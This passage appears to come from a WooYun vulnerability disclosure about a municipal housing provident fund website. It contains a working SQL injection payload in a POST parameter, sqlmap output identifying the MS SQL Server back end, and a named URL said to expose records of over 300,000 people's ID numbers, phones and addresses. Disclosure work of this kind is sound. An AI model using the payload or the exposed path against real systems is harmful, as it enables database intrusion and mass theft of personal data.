FrOenr+mHkeaUr+WPlgUBMmcQBRXkvY/miL/lhaznp6/ph5HotLfmrL4FATNnEAUG5YW25LuWBQE0Z2R
kAhcPDxYCHgRUZXh0BQcyNDU0MTgwZGQCGQ8PFgIfAQUq5LiJ5piO5biC5L2P5oi/5YWs56ev6YeR5Li
a5Yqh5ZKo6K+i54Ot57q/ZGQCGw8PFgIfAQUFMTIzMjlkZAIdDw8WAh8BBSHmipXor4nnm5HnnaPnlLX
or53vvJowNTk4LTgyNzY3NjlkZAIfD2QWBAIFDxBkDxYGZgIBAgICAwIEAgUWBhAFDS0t6K+36YCJ5ou
pLS1lZxAFFeS9j+aIv+WFrOenr+mHkeW8gOaItwUBMGcQBRXkvY/miL/lhaznp6/ph5HnvLTlrZgFATF
nEAUV5L2P5oi/5YWs56ev6YeR5pSv5Y+WBQEyZxAFFeS9j+aIv+WFrOenr+mHkei0t+asvgUBM2cQBQb
lhbbku5YFATRnFgFmZAIJDxBkEBUQCeW4guS4reW/gw/otYTph5HlvZLpm4bnp5EP6LWE6YeR6L+Q5L2
c56eRD+iuoeWIkui0ouWKoeenkQ/lrqHorqHnm5HnnaPnp5EP57u85ZCI566h55CG56eRD+Wkp+eUsOe
uoeeQhumDqA/msLjlronnrqHnkIbpg6gP5piO5rqq566h55CG6YOoD+a4hea1geeuoeeQhumDqA/lroH
ljJbnrqHnkIbpg6gP5bu65a6B566h55CG6YOoD+azsOWugeeuoeeQhumDqA/lsIbkuZDnrqHnkIbpg6g
P5rKZ5Y6/566h55CG6YOoD+WwpOa6queuoeeQhumDqBUQBDAxMDAEMDEwMQQwMTAyBDAxMDMEMDEwNAQ
wMTA1BDAyMDAEMDMwMAQwNDAwBDA1MDAEMDYwMAQwNzAwBDA4MDAEMDkwMAQxMDAwBDExMDAUKwMQZ2d
nZ2dnZ2dnZ2dnZ2dnZxYBZmQCIQ8WAh8AZmQCIw8PFgIeB1Zpc2libGVnZGQCJQ8PFgYeDVBhZ2VyUGF
nZVNpemUCBR4OUGFnZXJSZWNvcmROdW1mHg5QYWdlclBhZ2VJbmRleAIBZGQCJw9kFggCAQ8QDxYGHg1
EYXRhVGV4dEZpZWxkBQhMaW5rTmFtZR4ORGF0YVZhbHVlRmllbGQFB0xpbmtVcmweC18hRGF0YUJvdW5
kZ2QQFQMTLS0t5ZCI5L2c5Y2V5L2NLS0tLR7kuInmmI7miL/lnLDkuqfnrqHnkIbkv6Hmga/nvZEe5Li
J5piO5L2P5oi/572u5Lia5ouF5L+d5YWs5Y+4FQMAF2h0dHA6Ly93d3cuc21mZGMuY29tLmNuE2h0dHA
6Ly93d3cuc21mZGMuY24UKwMDZ2dnZGQCAw8QDxYGHwYFCExpbmtOYW1lHwcFB0xpbmtVcmwfCGdkEBU
FEy0tLeaUv+W6nOmDqOmXqC0tLS0b5LiJ5piO5biC5Lq65rCR5pS/5bqc572R56uZHuS4reWkruS6uua
wkeaUv+W6nOmXqOaIt+e9keermRjnpo/lu7rnnIHlu7rorr7kv6Hmga/nvZES56aP5bu655yB6LSi5pS
/5Y6FFQUAFGh0dHA6Ly93d3cuc20uZ292LmNuEmh0dHA6Ly93d3cuZ292LmNuLxdodHRwOi8vd3d3LmZ
qanMuZ292LmNuLxlodHRwOi8vd3d3LmZqaWNwYS5vcmcuY24vFCsDBWdnZ2dnZGQCBQ8QDxYGHwYFCEx
pbmtOYW1lHwcFB0xpbmtVcmwfCGdkEBUMFi0tLeWFtuS7luWFrOenr+mHkS0tLS0b56aP5bee5L2P5oi
/5YWs56ev6YeR572R56uZG+WOpumXqOS9j+aIv+WFrOenr+mHkee9keermRvmvLPlt57kvY/miL/lhaz
np6/ph5HnvZHnq5kb5rOJ5bee5L2P5oi/5YWs56ev6YeR572R56uZG+m+meWyqeS9j+aIv+WFrOenr+m
Hkee9keermRvljZflubPkvY/miL/lhaznp6/ph5HnvZHnq5kb5a6B5b635L2P5oi/5YWs56ev6YeR572
R56uZG+iOhueUsOS9j+aIv+WFrOenr+mHkee9keermRvljJfkuqzkvY/miL/lhaznp6/ph5HnvZHnq5k
b5LiK5rW35L2P5oi/5YWs56ev6YeR572R56uZG+Wkqea0peS9j+aIv+WFrOenr+mHkee9keermRUMABZ
odHRwOi8vd3d3LmZ6emZnamouY29tF2h0dHA6Ly93d3cueG1namouZ292LmNuGGh0dHA6Ly93d3cuenp
namouZ292LmNuLxRodHRwOi8vd3d3LnF6Z2pqLmNvbRlodHRwOi8vd3d3Lmxvbmd5YW5namouY29tFGh
0dHA6Ly93d3cubnBnamouY29tFGh0dHA6Ly93d3cubmRnamouY29tFGh0dHA6Ly93d3cucHRnamouY29
tF2h0dHA6Ly93d3cuYmpnamouZ292LmNuFGh0dHA6Ly93d3cuc2hnamouY29tF2h0dHA6Ly93d3cuaG9
1c2VmdW5kLmNuFCsDDGdnZ2dnZ2dnZ2dnZ2RkAgcPEA8WBh8GBQhMaW5rTmFtZR8HBQdMaW5rVXJsHwh
nZBAVCBMtLS3lhbbku5bnvZHnq5ktLS0tD+aIv+S6p+S5i+eql+e9kQbnmb7luqYJ5Lq65rCR572RCeW
SjOiur+e9kQnmlrDljY7nvZEP56aP5bee5pCc5oi/572RCeS4reWNjue9kRUIABhodHRwOi8vd3d3LmV
ob21lZGF5LmNvbS8UaHR0cDovL3d3dy5iYWlkdS5jb20ZaHR0cDovL3d3dy5wZW9wbGUuY29tLmNuLxV
odHRwOi8vd3d3LmhleHVuLmNvbS8ZaHR0cDovL3d3dy54aW5odWFuZXQuY29tLxVodHRwOi8vZnouc29
1ZnVuLmNvbS8baHR0cDovL3d3dy5jaGluYS5jb20vemhfY24vFCsDCGdnZ2dnZ2dnZGQYAQUeX19Db25
0cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFDmltZ1dvWWFvTGl1WWFuBQ9pbWdTdW9Zb3VMaXVZYW4
FCWJ0blNlYXJjaDS79vZyaNg/Si/Qvfd08ltzABpu&__EVENTVALIDATION=/wEWLgKro+2nDQLu2pbf
AwLHoITABwKL+9LNBwLdtoOaCwLN2an0BwLS2an0BwLT2an0BwLQ2an0BwLR2an0BwLE2qDWDwKG+5aj
BwLEhISFCwKe66LgAgKf66LgAgKc66LgAgKb+8ahBAKln/PuCgK9l+PkCwKN5NbZBwLb2KFcAuXp1uwL
Av+YtpwJAvzjt4ACApbribUJAtON+OkCAuGR+4QKAveSyOQNApCGuoUEArmSlLwKArfNzccIAr/FrYAM
AvHPoesKAv3KoesKAo3P2fQKAvTZrrUEAunJhecNAujOz4UCAsvBnsQFAtmxrLcOArb4gqUJAtL4xMcO
AuGA1Z8HAvD9kDgCkt303QkCtfe5hgzzQoCFRGmiTihZZ/sQvN+N8yI+zw==&txtkey=1&drpSearch=
0&txtStart=2012-08-15&txtEnd=2015-08-15&txtName=2' AND 3919=CONVERT(INT,(SELECT
CHAR(113)+CHAR(109)+CHAR(120)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (3919=3919)
 THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(109)+CHAR(106)+CHAR(
113))) AND 'zQNC'='zQNC&dlstRange=2&txtNum=1&ddlPageIndex=1&HomePageBottomInfo1$
dlsthzdw=&HomePageBottomInfo1$dlstzfbm=&HomePageBottomInfo1$dlstqtgjj=&HomePageB
ottomInfo1$dlstqtwz=&btnSearch.x=33&btnSearch.y=14
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: txtName, type: Single quoted string (default)
[1] place: POST, parameter: txtNum, type: Single quoted string
[q] Quit
> 0
[15:44:54] [INFO] testing Microsoft SQL Server
[15:44:54] [INFO] confirming Microsoft SQL Server
[15:44:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


1.jpg


2.jpg


后面获取信息有些问题就不继续了。
2、可以读取记录文件,获取30余万人身份证、手机、工作信息
地址已经被提交过的:

http://www.smgjj.com/database/DataInput.aspx


获取上传的记录文件,里面含有大量的身份证、手机、工作信息、住址、甚至缴纳公积金的信息!~~~

3.jpg


4.jpg


漏洞证明:

如上

修复方案:

过滤修复
权限查看!~~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-19 10:10

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置。

最新状态:

暂无